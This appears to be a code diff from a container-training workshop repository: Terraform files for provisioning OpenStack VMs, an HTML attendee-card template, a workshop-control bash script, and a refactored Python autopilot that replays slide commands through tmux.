<td>{{ node }}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
{% if url %}
|
||||
{{ slides_are_at }}
|
||||
<p>
|
||||
<span class="scale">{{ url }}</span>
|
||||
</p>
|
||||
{% endif %}
|
||||
{% if img_bottom_src %}
|
||||
<img class="bottom" src="{{ img_bottom_src }}" />
|
||||
{% endif %}
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<p>Thanks for attending
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during CONFERENCE in Month YYYY!</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team, in person or
|
||||
online, with custom courses of
|
||||
any length and any level.
|
||||
</p>
|
||||
{% if qrcode %}
|
||||
<p>If you're interested, please scan that QR code to contact me:</p>
|
||||
<span class="qrcode"></span>
|
||||
{% else %}
|
||||
<p>If you're interested, you can contact me at:</p>
|
||||
{% endif %}
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
Can't render this file because it contains an unexpected character in line 1 and column 42.
|
5
prepare-vms/terraform/keypair.tf
Normal file
5
prepare-vms/terraform/keypair.tf
Normal file
@@ -0,0 +1,5 @@
|
||||
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
|
||||
name = "${var.prefix}"
|
||||
public_key = "${file("~/.ssh/id_rsa.pub")}"
|
||||
}
|
||||
|
||||
32
prepare-vms/terraform/machines.tf
Normal file
32
prepare-vms/terraform/machines.tf
Normal file
@@ -0,0 +1,32 @@
|
||||
resource "openstack_compute_instance_v2" "machine" {
|
||||
count = "${var.count}"
|
||||
name = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
|
||||
image_name = "Ubuntu 16.04.5 (Xenial Xerus)"
|
||||
flavor_name = "${var.flavor}"
|
||||
security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
|
||||
key_pair = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"
|
||||
|
||||
network {
|
||||
name = "${openstack_networking_network_v2.internal.name}"
|
||||
fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
|
||||
}
|
||||
}
|
||||
|
||||
resource "openstack_compute_floatingip_v2" "machine" {
|
||||
count = "${var.count}"
|
||||
# This is something provided to us by Enix when our tenant was provisioned.
|
||||
pool = "Public Floating"
|
||||
}
|
||||
|
||||
resource "openstack_compute_floatingip_associate_v2" "machine" {
|
||||
count = "${var.count}"
|
||||
floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
|
||||
instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
|
||||
fixed_ip = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
|
||||
}
|
||||
|
||||
output "ip_addresses" {
|
||||
value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
|
||||
}
|
||||
|
||||
variable "flavor" {}
|
||||
23
prepare-vms/terraform/network.tf
Normal file
23
prepare-vms/terraform/network.tf
Normal file
@@ -0,0 +1,23 @@
|
||||
resource "openstack_networking_network_v2" "internal" {
|
||||
name = "${var.prefix}"
|
||||
}
|
||||
|
||||
resource "openstack_networking_subnet_v2" "internal" {
|
||||
name = "${var.prefix}"
|
||||
network_id = "${openstack_networking_network_v2.internal.id}"
|
||||
cidr = "10.10.0.0/16"
|
||||
ip_version = 4
|
||||
dns_nameservers = ["1.1.1.1"]
|
||||
}
|
||||
|
||||
resource "openstack_networking_router_v2" "router" {
|
||||
name = "${var.prefix}"
|
||||
external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
|
||||
}
|
||||
|
||||
resource "openstack_networking_router_interface_v2" "router_internal" {
|
||||
router_id = "${openstack_networking_router_v2.router.id}"
|
||||
subnet_id = "${openstack_networking_subnet_v2.internal.id}"
|
||||
}
|
||||
|
||||
|
||||
13
prepare-vms/terraform/provider.tf
Normal file
13
prepare-vms/terraform/provider.tf
Normal file
@@ -0,0 +1,13 @@
|
||||
provider "openstack" {
|
||||
user_name = "${var.user}"
|
||||
tenant_name = "${var.tenant}"
|
||||
domain_name = "${var.domain}"
|
||||
password = "${var.password}"
|
||||
auth_url = "${var.auth_url}"
|
||||
}
|
||||
|
||||
variable "user" {}
|
||||
variable "tenant" {}
|
||||
variable "domain" {}
|
||||
variable "password" {}
|
||||
variable "auth_url" {}
|
||||
12
prepare-vms/terraform/secgroup.tf
Normal file
12
prepare-vms/terraform/secgroup.tf
Normal file
@@ -0,0 +1,12 @@
|
||||
resource "openstack_networking_secgroup_v2" "full_access" {
|
||||
name = "${var.prefix} - full access"
|
||||
}
|
||||
|
||||
resource "openstack_networking_secgroup_rule_v2" "full_access" {
|
||||
direction = "ingress"
|
||||
ethertype = "IPv4"
|
||||
protocol = ""
|
||||
remote_ip_prefix = "0.0.0.0/0"
|
||||
security_group_id = "${openstack_networking_secgroup_v2.full_access.id}"
|
||||
}
|
||||
|
||||
8
prepare-vms/terraform/vars.tf
Normal file
8
prepare-vms/terraform/vars.tf
Normal file
@@ -0,0 +1,8 @@
|
||||
variable "prefix" {
|
||||
type = "string"
|
||||
}
|
||||
|
||||
variable "count" {
|
||||
type = "string"
|
||||
}
|
||||
|
||||
@@ -1,20 +1,19 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Get the script's real directory, whether we're being called directly or via a symlink
|
||||
# Get the script's real directory.
|
||||
# This should work whether we're being called directly or via a symlink.
|
||||
if [ -L "$0" ]; then
|
||||
export SCRIPT_DIR=$(dirname $(readlink "$0"))
|
||||
else
|
||||
export SCRIPT_DIR=$(dirname "$0")
|
||||
fi
|
||||
|
||||
# Load all scriptlets
|
||||
# Load all scriptlets.
|
||||
cd "$SCRIPT_DIR"
|
||||
for lib in lib/*.sh; do
|
||||
. $lib
|
||||
done
|
||||
|
||||
TRAINER_IMAGE="preparevms_prepare-vms"
|
||||
|
||||
DEPENDENCIES="
|
||||
aws
|
||||
ssh
|
||||
@@ -25,49 +24,26 @@ DEPENDENCIES="
|
||||
man
|
||||
"
|
||||
|
||||
ENVVARS="
|
||||
AWS_ACCESS_KEY_ID
|
||||
AWS_SECRET_ACCESS_KEY
|
||||
AWS_DEFAULT_REGION
|
||||
SSH_AUTH_SOCK
|
||||
"
|
||||
# Check for missing dependencies, and issue a warning if necessary.
|
||||
missing=0
|
||||
for dependency in $DEPENDENCIES; do
|
||||
if ! command -v $dependency >/dev/null; then
|
||||
warning "Dependency $dependency could not be found."
|
||||
missing=1
|
||||
fi
|
||||
done
|
||||
if [ $missing = 1 ]; then
|
||||
warning "At least one dependency is missing. Install it or try the image wrapper."
|
||||
fi
|
||||
|
||||
check_envvars() {
|
||||
status=0
|
||||
for envvar in $ENVVARS; do
|
||||
if [ -z "${!envvar}" ]; then
|
||||
error "Environment variable $envvar is not set."
|
||||
if [ "$envvar" = "SSH_AUTH_SOCK" ]; then
|
||||
error "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
|
||||
fi
|
||||
status=1
|
||||
fi
|
||||
done
|
||||
return $status
|
||||
}
|
||||
# Check if SSH_AUTH_SOCK is set.
|
||||
# (If it's not, deployment will almost certainly fail.)
|
||||
if [ -z "${SSH_AUTH_SOCK}" ]; then
|
||||
warning "Environment variable SSH_AUTH_SOCK is not set."
|
||||
warning "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
|
||||
fi
|
||||
|
||||
check_dependencies() {
|
||||
status=0
|
||||
for dependency in $DEPENDENCIES; do
|
||||
if ! command -v $dependency >/dev/null; then
|
||||
warning "Dependency $dependency could not be found."
|
||||
status=1
|
||||
fi
|
||||
done
|
||||
return $status
|
||||
}
|
||||
|
||||
check_image() {
|
||||
docker inspect $TRAINER_IMAGE >/dev/null 2>&1
|
||||
}
|
||||
|
||||
check_envvars \
|
||||
|| die "Please set all required environment variables."
|
||||
|
||||
check_dependencies \
|
||||
|| warning "At least one dependency is missing. Install it or try the image wrapper."
|
||||
|
||||
# Now check which command was invoked and execute it
|
||||
# Now check which command was invoked and execute it.
|
||||
if [ "$1" ]; then
|
||||
cmd="$1"
|
||||
shift
|
||||
@@ -77,6 +53,3 @@ fi
|
||||
fun=_cmd_$cmd
|
||||
type -t $fun | grep -q function || die "Invalid command: $cmd"
|
||||
$fun "$@"
|
||||
|
||||
# export SSH_AUTH_DIRNAME=$(dirname $SSH_AUTH_SOCK)
|
||||
# docker-compose run prepare-vms "$@"
|
||||
|
||||
4
prepare-vms/www/README
Normal file
4
prepare-vms/www/README
Normal file
@@ -0,0 +1,4 @@
|
||||
This directory will contain symlinks to HTML and PDF files for the cards
|
||||
with the IP address, login, and password for the training environments.
|
||||
|
||||
The file "index.html" is empty on purpose: it prevents listing the files.
|
||||
0
prepare-vms/www/index.html
Normal file
0
prepare-vms/www/index.html
Normal file
4
slides/Dockerfile
Normal file
4
slides/Dockerfile
Normal file
@@ -0,0 +1,4 @@
|
||||
FROM alpine:3.11
|
||||
RUN apk add --no-cache entr py3-pip git zip
|
||||
COPY requirements.txt .
|
||||
RUN pip3 install -r requirements.txt
|
||||
@@ -34,6 +34,14 @@ compile each `foo.yml` file into `foo.yml.html`.
|
||||
You can also run `./build.sh forever`: it will monitor the current
|
||||
directory and rebuild slides automatically when files are modified.
|
||||
|
||||
If you have problems running `./build.sh` (because of
|
||||
Python dependencies or whatever),
|
||||
you can also run `docker-compose up` in this directory.
|
||||
It will start the `./build.sh forever` script in a container.
|
||||
It will also start a web server exposing the slides
|
||||
(but the slides should also work if you load them from your
|
||||
local filesystem).
|
||||
|
||||
|
||||
## Publishing pipeline
|
||||
|
||||
@@ -53,4 +61,4 @@ You can run `./slidechecker foo.yml.html` to check for
|
||||
missing images and show the number of slides in that deck.
|
||||
It requires `phantomjs` to be installed. It takes some
|
||||
time to run so it is not yet integrated with the publishing
|
||||
pipeline.
|
||||
pipeline.
|
||||
|
||||
15
slides/_redirects
Normal file
15
slides/_redirects
Normal file
@@ -0,0 +1,15 @@
|
||||
# Uncomment and/or edit one of the the following lines if necessary.
|
||||
#/ /kube-halfday.yml.html 200
|
||||
#/ /kube-fullday.yml.html 200
|
||||
#/ /kube-twodays.yml.html 200
|
||||
|
||||
# And this allows to do "git clone https://container.training".
|
||||
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
|
||||
|
||||
#/dockermastery https://www.udemy.com/course/docker-mastery/?referralCode=1410924A733D33635CCB
|
||||
#/kubernetesmastery https://www.udemy.com/course/kubernetesmastery/?referralCode=7E09090AF9B79E6C283F
|
||||
/dockermastery https://www.udemy.com/course/docker-mastery/?couponCode=SWEETFEBSALEC1
|
||||
/kubernetesmastery https://www.udemy.com/course/kubernetesmastery/?couponCode=SWEETFEBSALEC4
|
||||
|
||||
# Shortlink for the QRCode
|
||||
/q /qrcode.html 200
|
||||
@@ -26,9 +26,10 @@ IPADDR = None
|
||||
class State(object):
|
||||
|
||||
def __init__(self):
|
||||
self.clipboard = ""
|
||||
self.interactive = True
|
||||
self.verify_status = False
|
||||
self.simulate_type = True
|
||||
self.verify_status = True
|
||||
self.simulate_type = False
|
||||
self.switch_desktop = False
|
||||
self.sync_slides = False
|
||||
self.open_links = False
|
||||
@@ -38,6 +39,7 @@ class State(object):
|
||||
|
||||
def load(self):
|
||||
data = yaml.load(open("state.yaml"))
|
||||
self.clipboard = str(data["clipboard"])
|
||||
self.interactive = bool(data["interactive"])
|
||||
self.verify_status = bool(data["verify_status"])
|
||||
self.simulate_type = bool(data["simulate_type"])
|
||||
@@ -51,6 +53,7 @@ class State(object):
|
||||
def save(self):
|
||||
with open("state.yaml", "w") as f:
|
||||
yaml.dump(dict(
|
||||
clipboard=self.clipboard,
|
||||
interactive=self.interactive,
|
||||
verify_status=self.verify_status,
|
||||
simulate_type=self.simulate_type,
|
||||
@@ -66,6 +69,8 @@ class State(object):
|
||||
state = State()
|
||||
|
||||
|
||||
outfile = open("autopilot.log", "w")
|
||||
|
||||
def hrule():
|
||||
return "="*int(subprocess.check_output(["tput", "cols"]))
|
||||
|
||||
@@ -85,9 +90,11 @@ class Snippet(object):
|
||||
# On single-line snippets, the data follows the method immediately
|
||||
if '\n' in content:
|
||||
self.method, self.data = content.split('\n', 1)
|
||||
else:
|
||||
self.data = self.data.strip()
|
||||
elif ' ' in content:
|
||||
self.method, self.data = content.split(' ', 1)
|
||||
self.data = self.data.strip()
|
||||
else:
|
||||
self.method, self.data = content, None
|
||||
self.next = None
|
||||
|
||||
def __str__(self):
|
||||
@@ -186,7 +193,7 @@ def wait_for_prompt():
|
||||
if last_line == "$":
|
||||
# This is a perfect opportunity to grab the node's IP address
|
||||
global IPADDR
|
||||
IPADDR = re.findall("^\[(.*)\]", output, re.MULTILINE)[-1]
|
||||
IPADDR = re.findall("\[(.*)\]", output, re.MULTILINE)[-1]
|
||||
return
|
||||
# When we are in an alpine container, the prompt will be "/ #"
|
||||
if last_line == "/ #":
|
||||
@@ -223,7 +230,7 @@ def check_exit_status():
|
||||
def setup_tmux_and_ssh():
|
||||
if subprocess.call(["tmux", "has-session"]):
|
||||
logging.error("Couldn't connect to tmux. Please setup tmux first.")
|
||||
ipaddr = open("../../prepare-vms/ips.txt").read().split("\n")[0]
|
||||
ipaddr = "$IPADDR"
|
||||
uid = os.getuid()
|
||||
|
||||
raise Exception("""
|
||||
@@ -235,6 +242,8 @@ tmux
|
||||
|
||||
rm -f /tmp/tmux-{uid}/default && ssh -t -L /tmp/tmux-{uid}/default:/tmp/tmux-1001/default docker@{ipaddr} tmux new-session -As 0
|
||||
|
||||
(Or use workshopctl tmux)
|
||||
|
||||
3. If you cannot control a remote tmux:
|
||||
|
||||
tmux new-session ssh docker@{ipaddr}
|
||||
@@ -259,26 +268,11 @@ for slide in re.split("\n---?\n", content):
|
||||
slide_classes = slide_classes[0].split(",")
|
||||
slide_classes = [c.strip() for c in slide_classes]
|
||||
if excluded_classes & set(slide_classes):
|
||||
logging.info("Skipping excluded slide.")
|
||||
logging.debug("Skipping excluded slide.")
|
||||
continue
|
||||
slides.append(Slide(slide))
|
||||
|
||||
|
||||
def send_keys(data):
|
||||
if state.simulate_type and data[0] != '^':
|
||||
for key in data:
|
||||
if key == ";":
|
||||
key = "\\;"
|
||||
if key == "\n":
|
||||
if interruptible_sleep(1): return
|
||||
subprocess.check_call(["tmux", "send-keys", key])
|
||||
if interruptible_sleep(0.15*random.random()): return
|
||||
if key == "\n":
|
||||
if interruptible_sleep(1): return
|
||||
else:
|
||||
subprocess.check_call(["tmux", "send-keys", data])
|
||||
|
||||
|
||||
def capture_pane():
|
||||
return subprocess.check_output(["tmux", "capture-pane", "-p"]).decode('utf-8')
|
||||
|
||||
@@ -288,7 +282,7 @@ setup_tmux_and_ssh()
|
||||
|
||||
try:
|
||||
state.load()
|
||||
logging.info("Successfully loaded state from file.")
|
||||
logging.debug("Successfully loaded state from file.")
|
||||
# Let's override the starting state, so that when an error occurs,
|
||||
# we can restart the auto-tester and then single-step or debug.
|
||||
# (Instead of running again through the same issue immediately.)
|
||||
@@ -297,6 +291,7 @@ except Exception as e:
|
||||
logging.exception("Could not load state from file.")
|
||||
logging.warning("Using default values.")
|
||||
|
||||
|
||||
def move_forward():
|
||||
state.snippet += 1
|
||||
if state.snippet > len(slides[state.slide].snippets):
|
||||
@@ -320,10 +315,147 @@ def check_bounds():
|
||||
state.slide = len(slides)-1
|
||||
|
||||
|
||||
##########################################################
|
||||
# All functions starting with action_ correspond to the
|
||||
# code to be executed when seeing ```foo``` blocks in the
|
||||
# input. ```foo``` would call action_foo(state, snippet).
|
||||
##########################################################
|
||||
|
||||
|
||||
def send_keys(keys):
|
||||
subprocess.check_call(["tmux", "send-keys", keys])
|
||||
|
||||
# Send a single key.
|
||||
# Useful for special keys, e.g. tmux interprets these strings:
|
||||
# ^C (and all other sequences starting with a caret)
|
||||
# Space
|
||||
# ... and many others (check tmux manpage for details).
|
||||
def action_key(state, snippet):
|
||||
send_keys(snippet.data)
|
||||
|
||||
|
||||
# Send multiple keys.
|
||||
# If keystroke simulation is off, all keys are sent at once.
|
||||
# If keystroke simulation is on, keys are sent one by one, with a delay between them.
|
||||
def action_keys(state, snippet, keys=None):
|
||||
if keys is None:
|
||||
keys = snippet.data
|
||||
if not state.simulate_type:
|
||||
send_keys(keys)
|
||||
else:
|
||||
for key in keys:
|
||||
if key == ";":
|
||||
key = "\\;"
|
||||
if key == "\n":
|
||||
if interruptible_sleep(1): return
|
||||
send_keys(key)
|
||||
if interruptible_sleep(0.15*random.random()): return
|
||||
if key == "\n":
|
||||
if interruptible_sleep(1): return
|
||||
|
||||
|
||||
def action_hide(state, snippet):
|
||||
if state.run_hidden:
|
||||
action_bash(state, snippet)
|
||||
|
||||
|
||||
def action_bash(state, snippet):
|
||||
data = snippet.data
|
||||
# Make sure that we're ready
|
||||
wait_for_prompt()
|
||||
# Strip leading spaces
|
||||
data = re.sub("\n +", "\n", data)
|
||||
# Remove backticks (they are used to highlight sections)
|
||||
data = data.replace('`', '')
|
||||
# Add "RETURN" at the end of the command :)
|
||||
data += "\n"
|
||||
# Send command
|
||||
action_keys(state, snippet, data)
|
||||
# Force a short sleep to avoid race condition
|
||||
time.sleep(0.5)
|
||||
if snippet.next and snippet.next.method == "wait":
|
||||
wait_for_string(snippet.next.data)
|
||||
elif snippet.next and snippet.next.method == "longwait":
|
||||
wait_for_string(snippet.next.data, 10*TIMEOUT)
|
||||
else:
|
||||
wait_for_prompt()
|
||||
# Verify return code
|
||||
check_exit_status()
|
||||
|
||||
|
||||
def action_copy(state, snippet):
|
||||
screen = capture_pane()
|
||||
matches = re.findall(snippet.data, screen, flags=re.DOTALL)
|
||||
if len(matches) == 0:
|
||||
raise Exception("Could not find regex {} in output.".format(snippet.data))
|
||||
# Arbitrarily get the most recent match
|
||||
match = matches[-1]
|
||||
# Remove line breaks (like a screen copy paste would do)
|
||||
match = match.replace('\n', '')
|
||||
logging.debug("Copied {} to clipboard.".format(match))
|
||||
state.clipboard = match
|
||||
|
||||
|
||||
def action_paste(state, snippet):
|
||||
logging.debug("Pasting {} from clipboard.".format(state.clipboard))
|
||||
action_keys(state, snippet, state.clipboard)
|
||||
|
||||
|
||||
def action_check(state, snippet):
|
||||
wait_for_prompt()
|
||||
check_exit_status()
|
||||
|
||||
|
||||
def action_open(state, snippet):
|
||||
# Cheap way to get node1's IP address
|
||||
screen = capture_pane()
|
||||
url = snippet.data.replace("/node1", "/{}".format(IPADDR))
|
||||
# This should probably be adapted to run on different OS
|
||||
if state.open_links:
|
||||
subprocess.check_output(["xdg-open", url])
|
||||
focus_browser()
|
||||
if state.interactive:
|
||||
print("Press any key to continue to next step...")
|
||||
click.getchar()
|
||||
|
||||
|
||||
def action_tmux(state, snippet):
|
||||
subprocess.check_call(["tmux"] + snippet.data.split())
|
||||
|
||||
|
||||
def action_unknown(state, snippet):
|
||||
logging.warning("Unknown method {}: {!r}".format(snippet.method, snippet.data))
|
||||
|
||||
|
||||
def run_snippet(state, snippet):
|
||||
logging.info("Running with method {}: {}".format(snippet.method, snippet.data))
|
||||
try:
|
||||
action = globals()["action_"+snippet.method]
|
||||
except KeyError:
|
||||
action = action_unknown
|
||||
try:
|
||||
action(state, snippet)
|
||||
result = "OK"
|
||||
except:
|
||||
result = "ERR"
|
||||
logging.exception("While running method {} with {!r}".format(snippet.method, snippet.data))
|
||||
# Try to recover
|
||||
try:
|
||||
wait_for_prompt()
|
||||
except:
|
||||
subprocess.check_call(["tmux", "new-window"])
|
||||
wait_for_prompt()
|
||||
outfile.write("{} SLIDE={} METHOD={} DATA={!r}\n".format(result, state.slide, snippet.method, snippet.data))
|
||||
outfile.flush()
|
||||
|
||||
|
||||
while True:
|
||||
state.save()
|
||||
slide = slides[state.slide]
|
||||
snippet = slide.snippets[state.snippet-1] if state.snippet else None
|
||||
if state.snippet and state.snippet <= len(slide.snippets):
|
||||
snippet = slide.snippets[state.snippet-1]
|
||||
else:
|
||||
snippet = None
|
||||
click.clear()
|
||||
print("[Slide {}/{}] [Snippet {}/{}] [simulate_type:{}] [verify_status:{}] "
|
||||
"[switch_desktop:{}] [sync_slides:{}] [open_links:{}] [run_hidden:{}]"
|
||||
@@ -385,7 +517,10 @@ while True:
|
||||
# continue until next timeout
|
||||
state.interactive = False
|
||||
elif command in ("y", "\r", " "):
|
||||
if not snippet:
|
||||
if snippet:
|
||||
run_snippet(state, snippet)
|
||||
move_forward()
|
||||
else:
|
||||
# Advance to next snippet
|
||||
# Advance until a slide that has snippets
|
||||
while not slides[state.slide].snippets:
|
||||
@@ -395,59 +530,5 @@ while True:
|
||||
break
|
||||
# And then advance to the snippet
|
||||
move_forward()
|
||||
continue
|
||||
method, data = snippet.method, snippet.data
|
||||
logging.info("Running with method {}: {}".format(method, data))
|
||||
if method == "keys":
|
||||
send_keys(data)
|
||||
elif method == "bash" or (method == "hide" and state.run_hidden):
|
||||
# Make sure that we're ready
|
||||
wait_for_prompt()
|
||||
# Strip leading spaces
|
||||
data = re.sub("\n +", "\n", data)
|
||||
# Remove backticks (they are used to highlight sections)
|
||||
data = data.replace('`', '')
|
||||
# Add "RETURN" at the end of the command :)
|
||||
data += "\n"
|
||||
# Send command
|
||||
send_keys(data)
|
||||
# Force a short sleep to avoid race condition
|
||||
time.sleep(0.5)
|
||||
if snippet.next and snippet.next.method == "wait":
|
||||
wait_for_string(snippet.next.data)
|
||||
elif snippet.next and snippet.next.method == "longwait":
|
||||
wait_for_string(snippet.next.data, 10*TIMEOUT)
|
||||
else:
|
||||
wait_for_prompt()
|
||||
# Verify return code
|
||||
check_exit_status()
|
||||
elif method == "copypaste":
|
||||
screen = capture_pane()
|
||||
matches = re.findall(data, screen, flags=re.DOTALL)
|
||||
if len(matches) == 0:
|
||||
raise Exception("Could not find regex {} in output.".format(data))
|
||||
# Arbitrarily get the most recent match
|
||||
match = matches[-1]
|
||||
# Remove line breaks (like a screen copy paste would do)
|
||||
match = match.replace('\n', '')
|
||||
send_keys(match + '\n')
|
||||
# FIXME: we should factor out the "bash" method
|
||||
wait_for_prompt()
|
||||
check_exit_status()
|
||||
elif method == "open":
|
||||
# Cheap way to get node1's IP address
|
||||
screen = capture_pane()
|
||||
url = data.replace("/node1", "/{}".format(IPADDR))
|
||||
# This should probably be adapted to run on different OS
|
||||
if state.open_links:
|
||||
subprocess.check_output(["xdg-open", url])
|
||||
focus_browser()
|
||||
if state.interactive:
|
||||
print("Press any key to continue to next step...")
|
||||
click.getchar()
|
||||
else:
|
||||
logging.warning("Unknown method {}: {!r}".format(method, data))
|
||||
move_forward()
|
||||
|
||||
else:
|
||||
logging.warning("Unknown command {}.".format(command))
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user